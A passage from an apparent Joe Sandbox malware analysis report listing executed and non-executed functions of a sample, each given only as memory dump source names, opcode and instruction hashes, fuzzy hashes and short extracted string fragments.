                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction ID: 239fc04a3d08b4a6a2dd6a6ab780083395807f37b6dc89078ff0fd2797dbc660
                                                                      • Opcode Fuzzy Hash: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction Fuzzy Hash: B5117030D1E9098BEB54EB18D8466F976D1FF56340F1041B9D84FD32A2ED38686946C2
                                                                      Function 00007FFAAB440C38 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction ID: 958d5a679b9930a30a02119475dfa8c50176f44c802e02bc9f22e0f0c4c3c54e
                                                                      • Opcode Fuzzy Hash: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction Fuzzy Hash: 40119E35A0D689DFE7069B68C8401D97FB0EF83251F1485B7C489DB2A2E538266987D1
                                                                      Function 00007FFAAB440C40 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction ID: 034a2b631499da161201492a205d8ecd21f19c34d31f12b54a448c79055f56c8
                                                                      • Opcode Fuzzy Hash: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction Fuzzy Hash: 1E11AC35A0D289DFE7029B68C4401D97FB0EF82250F1485B6C449CB2A2D63826698780
                                                                      Function 00007FFAAB446F83 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction ID: 362b00be108e3da212128b5bf4222bc6b77c146f4163b3853cabbd2e03b6f199
                                                                      • Opcode Fuzzy Hash: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction Fuzzy Hash: CB01E130A1950ACFEB54EB28D455AF872D1EF56340F1180B5D84FC72A3ED28A8694685
                                                                      Function 00007FFAAB440C48 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction ID: dd3d352653893482c2165113a11650171e4042ff6dcd5e90ed65bf565dd30d71
                                                                      • Opcode Fuzzy Hash: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction Fuzzy Hash: 9B016935A0D389DFE706DB68C8441D9BFB0EF43340F1485F6C449DB2A2EA386A68C781
                                                                      Function 00007FFAAB446FE1 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Function 00007FFAAB454D25 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: 4c4eb48d6c3a926962e49cf5ba2bf4c679c258a3add28ef3d7d2fb2cee1dc529
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: 25F09630A4DD0BCFF656DB18A4506B93290FF95340F118279D44EC61AAEE28EC1981C4
                                                                      Function 00007FFAAB44701E Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Function 00007FFAAB478119 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction ID: a08276fa49abe39d026f06bce9d632830a9ff94055a979ab26b8eb21608ff79e
                                                                      • Opcode Fuzzy Hash: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction Fuzzy Hash: 29E04F7194E7C08FC70B973588A88A07F64DE6721174A41EAC045CF6B3DA199C4AC712
                                                                      Function 00007FFAAB455B10 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction ID: 31c1be1aecda61acda28c2d3a46695ccd06f9eaabd42630ea7bbeaf9b53ac20d
                                                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction Fuzzy Hash: 89D05E30B6090D4B8B0CA62D8858430F3D1EBAA6067D45278940BC2291ED25ECCA8B80
                                                                      Function 00007FFAAB47AC70 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB47AD40 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB459FB0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 4731d078e3a759ba495a7e0e0eb6d7b1bcf92d2f55c84211b01787c8f054e492
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: 6CE0DF31E899478BF304E304D4543F87201AB223A0F04C3B8C44C972E6EE2DAD4886C1
                                                                      Function 00007FFAAB454597 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b6fc0e7f93c0defb1ed233a2a317b988ff84ef3b41f00068cb4c474f96eb30c
                                                                      • Instruction ID: 82250ed4220c4631ec4988edaa96bee9bd9c76a48cbc1be30d14c39788091243
                                                                      • Opcode Fuzzy Hash: 2b6fc0e7f93c0defb1ed233a2a317b988ff84ef3b41f00068cb4c474f96eb30c
                                                                      • Instruction Fuzzy Hash: 39E08C71E6592ECBF764DBA8D8056BD67B1FB45640F80023AD009D7299CE242C024B90
                                                                      Function 00007FFAAB4725E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB453FE0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB477700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 097c72fa5e49c4a95ac1e1f9c995a91fde8d094d0cd5c3ed92f52ea13d8ce6a2
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: F5D01234B619044F870CA739885987477D1EB6A216B9540A9D00AC76B1D96ADC99C781
                                                                      Function 00007FFAAB440B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Function 00007FFAAB4406A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Function 00007FFAAB4412B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB443416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 264dca60f0ea0d428c6cfdb33ce320b2207c3cf24309a8e56df982d533b277e4
                                                                      • Instruction ID: 21ee1b109667f84188e5d6343eb7337975a0c52b636bfc36045d048d6e8ab64f
                                                                      • Opcode Fuzzy Hash: 264dca60f0ea0d428c6cfdb33ce320b2207c3cf24309a8e56df982d533b277e4
                                                                      • Instruction Fuzzy Hash: 18C04C46F59D6A97F2556228C42167F04569F84758F9444B4E00EC63D6DD4C9B1112CA
                                                                      Function 00007FFAAB443A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Function 00007FFAAB4406C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4409B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB46107C Relevance: 10.0, Strings: 7, Instructions: 1227COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63$0#=$0#=$0#=$0#=$p[5$p[5
                                                                      • API String ID: 0-2821616782
                                                                      • Opcode ID: 92a3060c72fcf4e98653d36ac548c8b66414bc527f2956677016e2cf022ede07
                                                                      • Instruction ID: 3a8be5ff0c6d424ed9300111b61660ab28b72ad92f41f41eda382b3373bc4926
                                                                      • Opcode Fuzzy Hash: 92a3060c72fcf4e98653d36ac548c8b66414bc527f2956677016e2cf022ede07
                                                                      • Instruction Fuzzy Hash: 1982A771A1D95A8FEB98EB28C465AB8B7E2FF95340F1445B9D00EC3293DD34AC4687C1
                                                                      Function 00007FFAAB450D4C Relevance: 6.5, Strings: 5, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5Z_H$b43$r63$r63
                                                                      • API String ID: 0-999556193
                                                                      • Opcode ID: ee2d4fde4ead3ea0fe0f7e46c1bfb864b69262723d3025692c339b55f51684ae
                                                                      • Instruction ID: 0eeffe6b3ef07266458dd920dc48d518a0c21ae49f0087f577446fd0fd447a27
                                                                      • Opcode Fuzzy Hash: ee2d4fde4ead3ea0fe0f7e46c1bfb864b69262723d3025692c339b55f51684ae
                                                                      • Instruction Fuzzy Hash: AF911BB6A19A998FE748DB68C865BADBFE1FB56350F4041BEC04DC73D6CA741804C780
                                                                      Function 00007FFAAB481715 Relevance: 3.2, Strings: 2, Instructions: 713COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$r63
                                                                      • API String ID: 0-3249758050
                                                                      • Opcode ID: 8762998300360134a885f2f4615219e8229c6ffaabff16e140131fae6fa297bc
                                                                      • Instruction ID: 8b2a2a7c08d6df3c350e586c8d5466fd3b456b86f32b43aa8aa9b102601158ea
                                                                      • Opcode Fuzzy Hash: 8762998300360134a885f2f4615219e8229c6ffaabff16e140131fae6fa297bc
                                                                      • Instruction Fuzzy Hash: D6D19D6191D6964BE31D47694C420B57BD2EF9B281B18C2BED9EFC70A7D918E80B82C1
                                                                      Function 00007FFAAB481958 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: a79160f42891ce8cfe7a66720d6530c9010cc9e533366bbf03073532d396bdac
                                                                      • Instruction ID: 7ea51bd93b25ca83bd7e6d5aee09731e723da9228c7f19f69c7134fdfd6d1010
                                                                      • Opcode Fuzzy Hash: a79160f42891ce8cfe7a66720d6530c9010cc9e533366bbf03073532d396bdac
                                                                      • Instruction Fuzzy Hash: A2816962E1D65647E31C4A6D4C420B277D6EBCB295B18C27EDDEFC7197D818E80B42C1
                                                                      Function 00007FFAAB482CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 289f7ab05839d315bdf69f89a319b8cb6e3ed8bc46ed0277736787f6f686d241
                                                                      • Instruction ID: 2945eb3fbd7778687ffcda0fb644c4ea0c0d1ec4aef0295ad1042d4c2fb7d9f6
                                                                      • Opcode Fuzzy Hash: 289f7ab05839d315bdf69f89a319b8cb6e3ed8bc46ed0277736787f6f686d241
                                                                      • Instruction Fuzzy Hash: 26419431A0C91ACFEB58E798C451BB877A2FBA9350F0542B9D01ED72D6CE286C4987C1
                                                                      Function 00007FFAAB485494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
